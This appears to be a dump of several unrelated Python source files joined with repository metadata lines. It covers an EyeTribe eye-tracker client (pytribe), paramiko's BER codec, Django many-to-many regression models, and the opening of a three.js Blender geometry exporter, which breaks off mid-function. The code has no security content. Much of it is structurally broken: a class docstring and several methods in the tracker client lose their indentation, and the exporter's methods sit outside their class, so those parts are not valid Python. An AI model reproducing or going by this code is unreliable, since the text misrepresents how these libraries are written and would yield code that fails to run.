                    }
        """
        # parse json message (JSON true/false arrive as Python bools)
        parsed = json.loads(jsonmsg)
        return parsed

    def revive(self):
        """Re-establishes a connection
        """
        # close old connection
        self.close()
        # initialize a connection
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((self.host, self.port))

    def close(self):
        """Closes the connection to the EyeTribe tracker
        """
        # close the socket connection
        self.sock.close()
class tracker:
"""class for SDK Tracker state and information related requests"""
    def __init__(self, connection):
        """Initializes a tracker instance

        arguments

        connection    --    a pytribe.connection instance for the currently
                    attached EyeTribe tracker
        """
        self.connection = connection
        # local bookkeeping of the assumed push/pull state
        self.push = True
    def set_connection(self, connection):
        """Set a new connection

        arguments

        connection    --    a pytribe.connection instance for the currently
                    attached EyeTribe tracker
        """
        # swap the stored connection object; subsequent requests use it
        self.connection = connection
def get_push(self):
"""Returns a Booleam reflecting the state: True for push mode,
False for pull mode (Boolean)
"""
# send the request
response = self.connection.request('tracker', 'get', ['push'])
# return value or error
if response['statuscode'] == 200:
return response['values']['push'] == 'true'
else:
raise Exception("Error in tracker.get_push: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
    def get_heartbeatinterval(self):
        """Returns the expected heartbeat interval in milliseconds
        (integer)

        raises an Exception on any non-200 status code from the tracker
        """
        # send the request
        response = self.connection.request('tracker', 'get', ['heartbeatinterval'])
        # return value or error (the original comment here mentioned push
        # mode, but this only checks the reply's status code)
        if response['statuscode'] == 200:
            return response['values']['heartbeatinterval']
        else:
            raise Exception("Error in tracker.get_heartbeatinterval: %s (code %d)" % (response['values']['statusmessage'], response['statuscode']))
def get_version(self):
"""Returns the version number (integer)
"""
# send the request
response = self.connection.request('tracker', 'get', ['version'])
# return value or error
if response['statuscode'] == 200:
return response['values']['version']
else:
raise Exception("Error in tracker.get_version: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
    def get_trackerstate(self):
        """Returns the state of the physical tracker (integer):
            0:    TRACKER_CONNECTED
                tracker is detected and working
            1:    TRACKER_NOT_CONNECTED
                tracker device is not connected
            2:    TRACKER_CONNECTED_BADFW
                tracker device is connected, but not working due to
                bad firmware
            3:    TRACKER_CONNECTED_NOUSB3
                tracker device is connected, but not working due to
                unsupported USB host
            4:    TRACKER_CONNECTED_NOSTREAM
                tracker device is connected, but no stream could be
                received

        raises an Exception on any non-200 status code from the tracker
        """
        # send the request
        response = self.connection.request('tracker', 'get', ['trackerstate'])
        # return value or error
        if response['statuscode'] == 200:
            return response['values']['trackerstate']
        else:
            raise Exception("Error in tracker.get_trackerstate: %s (code %d)" % (response['values']['statusmessage'], response['statuscode']))
def get_framerate(self):
    """Return the frame rate the tracker is running at (integer)."""
    response = self.connection.request('tracker', 'get', ['framerate'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_framerate: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return response['values']['framerate']
def get_iscalibrated(self):
    """Return True when the tracker currently holds a calibration (Boolean)."""
    response = self.connection.request('tracker', 'get', ['iscalibrated'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_iscalibrated: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    # the server reports booleans as the strings 'true'/'false'
    return response['values']['iscalibrated'] == 'true'
def get_iscalibrating(self):
    """Return True when the tracker is in calibration mode (Boolean)."""
    response = self.connection.request('tracker', 'get', ['iscalibrating'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_iscalibrating: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    # booleans come back from the server as 'true'/'false' strings
    return response['values']['iscalibrating'] == 'true'
def get_calibresult(self):
    """Gets the latest valid calibration result

    returns
    None when no calibration is available; otherwise a dict with the
    calibration results:
    { 'result':      Boolean, True when the calibration was succesful
      'deg':         float, average error in degrees of visual angle
      'Ldeg':        float, left eye error in degrees of visual angle
      'Rdeg':        float, right eye error in degrees of visual angle
      'calibpoints': list containing a dict per calibration point:
          { 'state':  int; 0 = no useful data obtained, resample;
                      1 = questionable quality, consider resampling;
                      2 = data ok
            'cpx', 'cpy':     calibration point coordinates
            'mecpx', 'mecpy': mean estimated coordinates
            'acd', 'Lacd', 'Racd':       accuracy in degrees of visual
                                         angle (average, left, right)
            'mepix', 'Lmepix', 'Rmepix': mean error in pixels
            'asdp', 'Lasdp', 'Rasdp':    standard deviation in pixels
          }
    }
    """
    # send the request
    response = self.connection.request('tracker', 'get', ['calibresult'])
    # raise on any error status
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_calibresult: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
    # BUGFIX: the server nests the data under 'calibresult' (see
    # calibration.pointend); the old check looked for 'calibpoints' at the
    # top level of 'values' and therefore always returned None
    if 'calibresult' not in response['values']:
        return None
    calibresult = response['values']['calibresult']
    # BUGFIX: 'degl'/'degr' are the left/right eye errors; they were
    # previously assigned to the opposite ('Rdeg'/'Ldeg') keys
    returndict = {'result': calibresult['result'],
                  'deg': calibresult['deg'],
                  'Ldeg': calibresult['degl'],
                  'Rdeg': calibresult['degr'],
                  'calibpoints': []}
    for pointdict in calibresult['calibpoints']:
        returndict['calibpoints'].append({
            'state': pointdict['state'],
            'cpx': pointdict['cp']['x'],
            'cpy': pointdict['cp']['y'],
            'mecpx': pointdict['mecp']['x'],
            'mecpy': pointdict['mecp']['y'],
            'acd': pointdict['acd']['ad'],
            'Lacd': pointdict['acd']['adl'],
            'Racd': pointdict['acd']['adr'],
            'mepix': pointdict['mepix']['mep'],
            'Lmepix': pointdict['mepix']['mepl'],
            'Rmepix': pointdict['mepix']['mepr'],
            'asdp': pointdict['asdp']['asd'],
            'Lasdp': pointdict['asdp']['asdl'],
            'Rasdp': pointdict['asdp']['asdr']})
    return returndict
def get_frame(self):
    """Returns the latest frame data (dict)
    { 'timestamp': string time representation,
      'time': integer timestamp in milliseconds,
      'fix': Boolean indicating whether there is a fixation,
      'state': integer 32bit masked tracker state,
      'rawx': integer raw x gaze coordinate in pixels,
      'rawy': integer raw y gaze coordinate in pixels,
      'avgx': integer smoothed x gaze coordinate in pixels,
      'avgy': integer smoothed y gaze coordinate in pixels,
      'psize': float average pupil size,
      'Lrawx': integer raw x left eye gaze coordinate in pixels,
      'Lrawy': integer raw y left eye gaze coordinate in pixels,
      'Lavgx': integer smoothed x left eye gaze coordinate in pixels,
      'Lavgy': integer smoothed y left eye gaze coordinate in pixels,
      'Lpsize': float left eye pupil size,
      'Lpupilx': integer raw left eye pupil centre x coordinate,
      'Lpupily': integer raw left eye pupil centre y coordinate,
      'Rrawx': integer raw x right eye gaze coordinate in pixels,
      'Rrawy': integer raw y right eye gaze coordinate in pixels,
      'Ravgx': integer smoothed x right eye gaze coordinate in pixels,
      'Ravgy': integer smoothed y right eye gaze coordinate in pixels,
      'Rpsize': float right eye pupil size,
      'Rpupilx': integer raw right eye pupil centre x coordinate,
      'Rpupily': integer raw right eye pupil centre y coordinate
    }
    (Docstring fix: the smoothed-y keys were previously mislabelled
    'avgx'/'Lavgx'/'Ravgx'; the returned dict uses 'avgy'/'Lavgy'/'Ravgy'.)
    """
    # send the request
    response = self.connection.request('tracker', 'get', ['frame'])
    # raise error if needed
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_frame: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
    # parse response; 'psize' is the mean of the two per-eye pupil sizes
    return { 'timestamp': response['values']['frame']['timestamp'],
             'time': response['values']['frame']['time'],
             'fix': response['values']['frame']['fix']=='true',
             'state': response['values']['frame']['state'],
             'rawx': response['values']['frame']['raw']['x'],
             'rawy': response['values']['frame']['raw']['y'],
             'avgx': response['values']['frame']['avg']['x'],
             'avgy': response['values']['frame']['avg']['y'],
             'psize': (response['values']['frame']['lefteye']['psize']+response['values']['frame']['righteye']['psize'])/2.0,
             'Lrawx': response['values']['frame']['lefteye']['raw']['x'],
             'Lrawy': response['values']['frame']['lefteye']['raw']['y'],
             'Lavgx': response['values']['frame']['lefteye']['avg']['x'],
             'Lavgy': response['values']['frame']['lefteye']['avg']['y'],
             'Lpsize': response['values']['frame']['lefteye']['psize'],
             'Lpupilx': response['values']['frame']['lefteye']['pcenter']['x'],
             'Lpupily': response['values']['frame']['lefteye']['pcenter']['y'],
             'Rrawx': response['values']['frame']['righteye']['raw']['x'],
             'Rrawy': response['values']['frame']['righteye']['raw']['y'],
             'Ravgx': response['values']['frame']['righteye']['avg']['x'],
             'Ravgy': response['values']['frame']['righteye']['avg']['y'],
             'Rpsize': response['values']['frame']['righteye']['psize'],
             'Rpupilx': response['values']['frame']['righteye']['pcenter']['x'],
             'Rpupily': response['values']['frame']['righteye']['pcenter']['y']
            }
def get_screenindex(self):
    """Return the screen index number in a multi screen setup (integer)."""
    response = self.connection.request('tracker', 'get', ['screenindex'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_screenindex: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return response['values']['screenindex']
def get_screenresw(self):
    """Return the screen resolution width in pixels (integer)."""
    response = self.connection.request('tracker', 'get', ['screenresw'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_screenresw: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return response['values']['screenresw']
def get_screenresh(self):
    """Return the screen resolution height in pixels (integer)."""
    response = self.connection.request('tracker', 'get', ['screenresh'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_screenresh: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return response['values']['screenresh']
def get_screenpsyw(self):
    """Return the physical screen width in meters (float)."""
    response = self.connection.request('tracker', 'get', ['screenpsyw'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_screenpsyw: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return response['values']['screenpsyw']
def get_screenpsyh(self):
    """Return the physical screen height in meters (float)."""
    response = self.connection.request('tracker', 'get', ['screenpsyh'])
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.get_screenpsyh: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return response['values']['screenpsyh']
def set_push(self, push=None):
    """Toggles the push state, or sets the state to the passed value

    keyword arguments
    push        --  Boolean indicating the state: True for push,
                    False for pull, or None to toggle the current state
                    (default = None)

    returns
    state       --  Boolean indicating the new push state
    """
    # validate the requested state
    if push is None:
        # toggle the current state (self.push only ever holds a bool here)
        self.push = not self.push
    elif isinstance(push, bool):
        # set state to passed value
        self.push = push
    else:
        # error on anything other than None, True or False
        raise Exception("tracker.set_push: push keyword argument should be a Boolean or None, not '%s'" % push)
    # send the request; the server expects the lowercase strings 'true'/'false'
    response = self.connection.request('tracker', 'set', {'push':str(self.push).lower()})
    # return value or error
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_push: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
    return self.push
def set_version(self, version):
    """Set the protocol version

    arguments
    version     --  integer version number
    """
    response = self.connection.request('tracker', 'set', {'version':version})
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_version: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    # echo the requested version back on success
    return version
def set_screenindex(self, index):
    """Set the screen index

    arguments
    index       --  integer index number of the screen that is to be
                    used with the tracker
    """
    response = self.connection.request('tracker', 'set', {'screenindex':index})
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_screenindex: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return index
def set_screenresw(self, width):
    """Set the screen resolution width

    arguments
    width       --  integer screen resolution width in pixels
    """
    response = self.connection.request('tracker', 'set', {'screenresw':width})
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_screenresw: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return width
def set_screenresh(self, height):
    """Set the screen resolution height

    arguments
    height      --  integer screen resolution height in pixels
    """
    response = self.connection.request('tracker', 'set', {'screenresh':height})
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_screenresh: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return height
def set_screenpsyw(self, width):
    """Set the physical width of the screen

    arguments
    width       --  float physical screen width in metres
    """
    response = self.connection.request('tracker', 'set', {'screenpsyw':width})
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_screenpsyw: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return width
def set_screenpsyh(self, height):
    """Set the physical height of the screen

    arguments
    height      --  float physical screen height in metres
    """
    response = self.connection.request('tracker', 'set', {'screenpsyh':height})
    if response['statuscode'] != 200:
        raise Exception("Error in tracker.set_screenpsyh: %s (code %d)"
                        % (response['values']['statusmessage'], response['statuscode']))
    return height
class calibration:
    """class for calibration related requests"""

    def __init__(self, connection):
        """Initializes a calibration instance

        arguments
        connection  --  a pytribe.connection instance for the currently
                        attached EyeTribe tracker
        """
        self.connection = connection

    def set_connection(self, connection):
        """Set a new connection

        arguments
        connection  --  a pytribe.connection instance for the currently
                        attached EyeTribe tracker
        """
        self.connection = connection

    def start(self, pointcount=9):
        """Starts the calibration, using the passed number of calibration
        points

        keyword arguments
        pointcount  --  integer amount of calibration points that should
                        be used, which should be at least 7 (default = 9)

        returns
        success     --  True on success; raises an Exception on failure
        """
        response = self.connection.request('calibration', 'start',
                                           {'pointcount': pointcount})
        if response['statuscode'] != 200:
            raise Exception("Error in calibration.start: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
        return True

    def pointstart(self, x, y):
        """Mark the beginning of a new calibration point for the tracker to
        process

        arguments
        x           --  integer x coordinate of the calibration point
        y           --  integer y coordinate of the calibration point

        returns
        success     --  True on success; raises an Exception on failure
        """
        response = self.connection.request('calibration', 'pointstart',
                                           {'x': x, 'y': y})
        if response['statuscode'] != 200:
            raise Exception("Error in calibration.pointstart: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
        return True

    def pointend(self):
        """Mark the end of processing a calibration point

        returns
        True after a non-final point; after the final point, a dict with
        the calibration results:
        { 'result':      Boolean, True when the calibration was succesful
          'deg':         float, average error in degrees of visual angle
          'Ldeg':        float, left eye error in degrees of visual angle
          'Rdeg':        float, right eye error in degrees of visual angle
          'calibpoints': list containing a dict per calibration point:
              { 'state':  int; 0 = no useful data obtained, resample;
                          1 = questionable quality, consider resampling;
                          2 = data ok
                'cpx', 'cpy':     calibration point coordinates
                'mecpx', 'mecpy': mean estimated coordinates
                'acd', 'Lacd', 'Racd':       accuracy in degrees of
                                             visual angle (avg/left/right)
                'mepix', 'Lmepix', 'Rmepix': mean error in pixels
                'asdp', 'Lasdp', 'Rasdp':    standard deviation in pixels
              }
        }
        """
        response = self.connection.request('calibration', 'pointend', None)
        if response['statuscode'] != 200:
            raise Exception("Error in calibration.pointend: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
        # a missing 'calibresult' key means this was not the final point
        if 'calibresult' not in response['values']:
            return True
        # final point: flatten and return the full result
        return self._parse_calibresult(response['values']['calibresult'])

    def _parse_calibresult(self, calibresult):
        """Flatten the server's nested calibresult structure into the dict
        documented on pointend()."""
        # BUGFIX: 'degl'/'degr' are the left/right eye errors; they were
        # previously assigned to the opposite ('Rdeg'/'Ldeg') keys
        returndict = {'result': calibresult['result'],
                      'deg': calibresult['deg'],
                      'Ldeg': calibresult['degl'],
                      'Rdeg': calibresult['degr'],
                      'calibpoints': []}
        for pointdict in calibresult['calibpoints']:
            returndict['calibpoints'].append({
                'state': pointdict['state'],
                'cpx': pointdict['cp']['x'],
                'cpy': pointdict['cp']['y'],
                'mecpx': pointdict['mecp']['x'],
                'mecpy': pointdict['mecp']['y'],
                'acd': pointdict['acd']['ad'],
                'Lacd': pointdict['acd']['adl'],
                'Racd': pointdict['acd']['adr'],
                'mepix': pointdict['mepix']['mep'],
                'Lmepix': pointdict['mepix']['mepl'],
                'Rmepix': pointdict['mepix']['mepr'],
                'asdp': pointdict['asdp']['asd'],
                'Lasdp': pointdict['asdp']['asdl'],
                'Rasdp': pointdict['asdp']['asdr']})
        return returndict

    def abort(self):
        """Cancels the ongoing sequence and reinstates the previous
        calibration (only if there is one!)

        returns
        success     --  True on success; raises an Exception on failure
        """
        response = self.connection.request('calibration', 'abort', None)
        if response['statuscode'] != 200:
            raise Exception("Error in calibration.abort: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
        return True

    def clear(self):
        """Removes the current calibration from the tracker

        returns
        success     --  True on success; raises an Exception on failure
        """
        response = self.connection.request('calibration', 'clear', None)
        if response['statuscode'] != 200:
            raise Exception("Error in calibration.clear: %s (code %d)" % (response['values']['statusmessage'],response['statuscode']))
        return True
class heartbeat:
    """class for signalling heartbeats to the server"""

    def __init__(self, connection):
        """Initializes a heartbeat instance (not implemented in the SDK yet)

        arguments
        connection  --  a pytribe.connection instance for the currently
                        attached EyeTribe tracker
        """
        self.connection = connection

    def set_connection(self, connection):
        """Set a new connection

        arguments
        connection  --  a pytribe.connection instance for the currently
                        attached EyeTribe tracker
        """
        self.connection = connection

    def beat(self):
        """Sends a heartbeat to the device; returns True on success."""
        response = self.connection.request('heartbeat', None, None)
        if response['statuscode'] != 200:
            raise Exception("Error in heartbeat.beat: %s (code %d)"
                            % (response['values']['statusmessage'], response['statuscode']))
        return True
# # # # #
# DEBUG #
if __name__ == "__main__":
    # Quick smoke test: record gaze data for ten seconds, then shut down.
    tracker = EyeTribe()
    tracker.start_recording()
    time.sleep(10)
    tracker.stop_recording()
    tracker.close()
# # # # #
selboo/paramiko | refs/heads/master | paramiko/ber.py | 11 | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
from paramiko.common import max_byte, zero_byte
from paramiko.py3compat import b, byte_ord, byte_chr, long
import paramiko.util as util
class BERException(Exception):
    """Raised when BER encoding or decoding fails."""
class BER(object):
    """
    Robey's tiny little attempt at a BER decoder.
    """

    def __init__(self, content=bytes()):
        # content: the encoded byte string; idx: read cursor used by
        # decode_next(). The bytes() default is immutable, so sharing it
        # across calls is safe.
        self.content = b(content)
        self.idx = 0

    def asbytes(self):
        # Return the raw encoded bytes accumulated so far.
        return self.content

    def __str__(self):
        # NOTE(review): this returns bytes, which on Python 3 violates the
        # __str__ contract (must return str) -- confirm whether any caller
        # relies on this before changing it.
        return self.asbytes()

    def __repr__(self):
        return 'BER(\'' + repr(self.content) + '\')'

    def decode(self):
        # Decode and return the next (single) element from the buffer.
        return self.decode_next()

    def decode_next(self):
        # Decode one TLV element at the cursor. Returns None when the
        # buffer is exhausted or the element is truncated.
        if self.idx >= len(self.content):
            return None
        ident = byte_ord(self.content[self.idx])
        self.idx += 1
        if (ident & 31) == 31:
            # identifier > 30
            # (high-tag-number form: 7 bits per octet, MSB set on all but
            # the final octet)
            ident = 0
            while self.idx < len(self.content):
                t = byte_ord(self.content[self.idx])
                self.idx += 1
                ident = (ident << 7) | (t & 0x7f)
                if not (t & 0x80):
                    break
        if self.idx >= len(self.content):
            return None
        # now fetch length
        size = byte_ord(self.content[self.idx])
        self.idx += 1
        if size & 0x80:
            # more complimicated...
            # (long-form length: low 7 bits give the number of length octets)
            # FIXME: theoretically should handle indefinite-length (0x80)
            t = size & 0x7f
            if self.idx + t > len(self.content):
                return None
            size = util.inflate_long(self.content[self.idx: self.idx + t], True)
            self.idx += t
        if self.idx + size > len(self.content):
            # can't fit
            return None
        data = self.content[self.idx: self.idx + size]
        self.idx += size
        # now switch on id
        if ident == 0x30:
            # sequence
            return self.decode_sequence(data)
        elif ident == 2:
            # int
            return util.inflate_long(data)
        else:
            # 1: boolean (00 false, otherwise true)
            # only SEQUENCE and INTEGER are supported; everything else raises
            raise BERException('Unknown ber encoding type %d (robey is lazy)' % ident)

    def decode_sequence(data):
        # Decode every element of a SEQUENCE body into a list.
        out = []
        ber = BER(data)
        while True:
            x = ber.decode_next()
            if x is None:
                break
            out.append(x)
        return out

    decode_sequence = staticmethod(decode_sequence)

    def encode_tlv(self, ident, val):
        # Append one tag/length/value triple to the content buffer.
        # no need to support ident > 31 here
        self.content += byte_chr(ident)
        if len(val) > 0x7f:
            # long-form length: 0x80 | count-of-length-octets, then the octets
            lenstr = util.deflate_long(len(val))
            self.content += byte_chr(0x80 + len(lenstr)) + lenstr
        else:
            self.content += byte_chr(len(val))
        self.content += val

    def encode(self, x):
        # Encode a bool, int/long, str, or (recursively) list/tuple.
        if type(x) is bool:
            if x:
                self.encode_tlv(1, max_byte)
            else:
                self.encode_tlv(1, zero_byte)
        elif (type(x) is int) or (type(x) is long):
            self.encode_tlv(2, util.deflate_long(x))
        elif type(x) is str:
            self.encode_tlv(4, x)
        elif (type(x) is list) or (type(x) is tuple):
            self.encode_tlv(0x30, self.encode_sequence(x))
        else:
            raise BERException('Unknown type for encoding: %s' % repr(type(x)))

    def encode_sequence(data):
        # Encode each item of data and return the concatenated bytes.
        ber = BER()
        for item in data:
            ber.encode(item)
        return ber.asbytes()

    encode_sequence = staticmethod(encode_sequence)
|
ccnmtl/lettuce | refs/heads/master | tests/integration/lib/Django-1.3/tests/regressiontests/m2m_regress/models.py | 92 | from django.db import models
from django.contrib.auth import models as auth
# No related name is needed here, since symmetrical relations are not
# explicitly reversible.
class SelfRefer(models.Model):
    # Both M2M fields are symmetrical self-references, so Django creates no
    # reverse accessors and no related_name is required.
    name = models.CharField(max_length=10)
    references = models.ManyToManyField('self')
    related = models.ManyToManyField('self')

    def __unicode__(self):
        return self.name
class Tag(models.Model):
    # Simple named tag; also serves as a concrete base class and as the
    # target of the M2M relations below.
    name = models.CharField(max_length=10)

    def __unicode__(self):
        return self.name
# Regression for #11956 -- a many to many to the base class
class TagCollection(Tag):
    # Regression test for #11956 -- an M2M pointing back at this model's
    # own concrete base class.
    tags = models.ManyToManyField(Tag, related_name='tag_collections')

    def __unicode__(self):
        return self.name
# A related_name is required on one of the ManyToManyField entries here because
# they are both addressable as reverse relations from Tag.
class Entry(models.Model):
    name = models.CharField(max_length=10)
    # 'related' needs an explicit related_name because both fields reverse
    # to Tag and would otherwise clash.
    topics = models.ManyToManyField(Tag)
    related = models.ManyToManyField(Tag, related_name="similar")

    def __unicode__(self):
        return self.name
# Two models both inheriting from a base model with a self-referential m2m field
class SelfReferChild(SelfRefer):
    # Inherits the self-referential M2M fields from SelfRefer.
    pass
class SelfReferChildSibling(SelfRefer):
    # Second child of SelfRefer, to exercise sibling models sharing an
    # inherited self-referential M2M.
    pass
# Many-to-Many relation between models, where one of the PK's isn't an Autofield
class Line(models.Model):
    # Target of Worksheet.lines; uses the default AutoField primary key.
    name = models.CharField(max_length=100)
class Worksheet(models.Model):
    # One side of the M2M deliberately uses a non-AutoField primary key.
    id = models.CharField(primary_key=True, max_length=100)
    # NOTE(review): null=True has no effect on a ManyToManyField -- confirm
    # it is intentional here (kept as written for the regression test).
    lines = models.ManyToManyField(Line, blank=True, null=True)
# Regression for #11226 -- A model with the same name that another one to
# which it has a m2m relation. This shouldn't cause a name clash between
# the automatically created m2m intermediary table FK field names when
# running syncdb
class User(models.Model):
    # Deliberately shares its name with django.contrib.auth.models.User to
    # test intermediary-table FK name clashes during syncdb (#11226).
    name = models.CharField(max_length=30)
    friends = models.ManyToManyField(auth.User)
|
freekh/three.js | refs/heads/master | utils/exporters/blender/addons/io_three/exporter/geometry.py | 124 | """
Module for creating Three.js geometry JSON nodes.
"""
import os
from .. import constants, logger
from . import base_classes, io, api
FORMAT_VERSION = 3
class Geometry(base_classes.BaseNode):
"""Class that wraps a single mesh/geometry node."""
def __init__(self, node, parent=None):
    """Initialize the geometry wrapper.

    :param node: the mesh node being wrapped
    :param parent: parent node (its options control the export)
    """
    logger.debug("Geometry().__init__(%s)", node)

    #@TODO: maybe better to have `three` constants for
    #       strings that are specific to `three` properties
    geo_type = constants.GEOMETRY.title()

    # allow the export options to force BufferGeometry output instead
    if parent.options.get(constants.GEOMETRY_TYPE):
        opt_type = parent.options[constants.GEOMETRY_TYPE]
        if opt_type == constants.BUFFER_GEOMETRY:
            geo_type = constants.BUFFER_GEOMETRY
        elif opt_type != constants.GEOMETRY:
            logger.error("Unknown geometry type %s", opt_type)

    logger.info("Setting %s to '%s'", node, geo_type)

    self._defaults[constants.TYPE] = geo_type
    base_classes.BaseNode.__init__(self, node,
                                   parent=parent,
                                   type=geo_type)
@property
def animation_filename(self):
    """Calculate the file name for the animation file.

    :return: base name for the file, or None when the node carries no
             animation data
    """
    compression = self.options.get(constants.COMPRESSION)
    if compression in (None, constants.NONE):
        ext = constants.JSON
    elif compression == constants.MSGPACK:
        ext = constants.PACK
    else:
        # BUGFIX: previously `ext` was left unbound for an unrecognized
        # compression option, raising NameError below; fall back to JSON
        logger.warning("Unknown compression %s, defaulting to JSON",
                       compression)
        ext = constants.JSON

    # pick whichever animation payload this node carries
    for key in (constants.MORPH_TARGETS, constants.ANIMATION):
        if key in self.keys():
            break
    else:
        logger.info("%s has no animation data", self.node)
        return

    return '%s.%s.%s' % (self.node, key, ext)
@property
def face_count(self):
    """Parse the bit masks of the `faces` array.

    Each face record starts with a bitmask describing which optional
    per-face data follows, so the record stride varies per face.

    :rtype: int
    """
    try:
        faces = self[constants.FACES]
    except KeyError:
        logger.debug("No parsed faces found")
        return 0

    length = len(faces)
    offset = 0
    # test whether bit `y` is set in mask `x`
    bitset = lambda x, y: x & (1 << y)
    face_count = 0

    masks = (constants.MASK[constants.UVS],
             constants.MASK[constants.NORMALS],
             constants.MASK[constants.COLORS])

    while offset < length:
        bit = faces[offset]
        offset += 1
        face_count += 1

        # quads carry four vertex indices, triangles three
        is_quad = bitset(bit, constants.MASK[constants.QUAD])
        vector = 4 if is_quad else 3
        offset += vector

        # a material index adds a single entry
        if bitset(bit, constants.MASK[constants.MATERIALS]):
            offset += 1

        # each optional per-vertex attribute adds another `vector` entries
        for mask in masks:
            if bitset(bit, mask):
                offset += vector

    return face_count
@property
def metadata(self):
    """Metadata for the current node.

    :rtype: dict
    """
    metadata = {
        constants.GENERATOR: constants.THREE,
        constants.VERSION: FORMAT_VERSION
    }

    # Geometry and BufferGeometry record different component counts
    if self[constants.TYPE] == constants.GEOMETRY.title():
        self._geometry_metadata(metadata)
    else:
        self._buffer_geometry_metadata(metadata)

    return metadata
def copy(self, scene=True):
    """Copy the geometry definitions to a standard dictionary.

    :param scene: toggle for scene formatting
                  (Default value = True)
    :type scene: bool
    :rtype: dict
    """
    logger.debug("Geometry().copy(scene=%s)", scene)
    # choose the output layout based on the scene flag
    dispatch = {
        True: self._scene_format,
        False: self._geometry_format
    }
    data = dispatch[scene]()

    # materials are optional; copy them when present
    try:
        data[constants.MATERIALS] = self[constants.MATERIALS].copy()
    except KeyError:
        logger.debug("No materials to copy")

    return data
def copy_textures(self, texture_folder=''):
    """Copy the textures to the destination directory.

    :param texture_folder: folder, relative to the scene's directory,
                           to copy registered textures into
                           (Default value = '')
    """
    logger.debug("Geometry().copy_textures()")
    # only copy when the export options request it
    if self.options.get(constants.COPY_TEXTURES):
        texture_registration = self.register_textures()
        if texture_registration:
            logger.info("%s has registered textures", self.node)
            dirname = os.path.dirname(self.scene.filepath)
            full_path = os.path.join(dirname, texture_folder)
            io.copy_registered_textures(
                full_path, texture_registration)
def parse(self):
    """Parse the current node into either Geometry or BufferGeometry
    components, depending on the type chosen at construction time."""
    logger.debug("Geometry().parse()")
    if self[constants.TYPE] == constants.GEOMETRY.title():
        logger.info("Parsing Geometry format")
        self._parse_geometry()
    else:
        logger.info("Parsing BufferGeometry format")
        self._parse_buffer_geometry()
def register_textures(self):
    """Obtain a texture registration object.

    :rtype: dict
    """
    logger.debug("Geometry().register_textures()")
    return api.mesh.texture_registration(self.node)
def write(self, filepath=None):
    """Write the geometry definitions to disk. Uses the
    desitnation path of the scene.

    :param filepath: optional output file path
                     (Default value = None, meaning the scene's path)
    :type filepath: str
    """
    logger.debug("Geometry().write(filepath=%s)", filepath)

    filepath = filepath or self.scene.filepath

    # geometry-only (non-scene) layout is written here
    io.dump(filepath, self.copy(scene=False),
            options=self.scene.options)

    # optionally copy texture maps next to the output
    if self.options.get(constants.MAPS):
        logger.info("Copying textures for %s", self.node)
        self.copy_textures()
def write_animation(self, filepath):
    """Write the animation definitions to a separate file
    on disk. This helps optimize the geometry file size.

    :param filepath: destination directory
    :type filepath: str
    :return: the full path written to, or None when there is no
             animation data
    """
    logger.debug("Geometry().write_animation(%s)", filepath)

    # find whichever animation payload this node carries
    for key in (constants.MORPH_TARGETS, constants.ANIMATION):
        try:
            data = self[key]
            break
        except KeyError:
            pass
    else:
        logger.info("%s has no animation data", self.node)
        return

    # animation_filename checks the same keys, so it is non-None here
    filepath = os.path.join(filepath, self.animation_filename)
    if filepath:
        logger.info("Dumping animation data to %s", filepath)
        io.dump(filepath, data, options=self.scene.options)
        return filepath
    else:
        logger.warning("Could not determine a filepath for "\
            "animation data. Nothing written to disk.")
def _component_data(self):
    """Query the component data only

    :rtype: dict
    """
    logger.debug("Geometry()._component_data()")

    # BufferGeometry keeps everything under ATTRIBUTES already
    if self[constants.TYPE] != constants.GEOMETRY.title():
        return self[constants.ATTRIBUTES]

    components = [constants.VERTICES, constants.FACES,
